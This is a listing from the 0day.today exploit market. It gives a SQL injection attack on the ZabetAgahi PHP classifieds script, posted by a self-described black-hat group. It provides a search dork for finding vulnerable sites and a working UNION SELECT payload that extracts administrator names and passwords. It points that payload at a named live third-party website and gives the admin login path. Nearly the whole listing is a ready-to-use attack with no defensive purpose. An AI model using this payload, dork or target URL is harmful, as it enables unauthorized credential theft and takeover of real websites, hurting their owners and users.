[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ZabetAgahi SQL Injection Vulnerability

Author
3H34N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16146
Category
web applications
Date add
21-05-2011
Platform
php
#(+) Exploit Title: ZabetAgahi SQLInjection Vulnerability
#(+) Author       : 3H34N
#(+) E-mail       : Ehsan.Empire@Att.Net
#(+) dork         : inurl:ZabetAgahiCategory.php?cid=
#(+) Versian      : Gold Ver & Othder
#(+) Category     : Web Apps [SQl]
#(+) My Home 	  : http://Security-War.com and http://Black-HG.com
#(+) Platform     : Tested on: linux-Windows
#(+) Download     : http://www.zabet.ir/
 
____________________________________________________________________
____________________________________________________________________
 
 
The security problem in the file "ZabetAgahiCategory.php" has been created.
 
[~] Vulnerable File :
 
#      [+]http://localhost.com/ZabetAgahiCategory.php?cid=[SQL]

#      [+]-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--

:

 
#      [+]http://www.alborz137.ir/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--
 
     
 
Note:login page is here http://localhost.com//AdminZabetAgahi/AdminZabetAgahiHome.php
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~  S3Ri0uS and all Friends
(+)Gr33ts to : All Iranian HackerZ
######################################################################## 



#  0day.today [2024-12-25]  #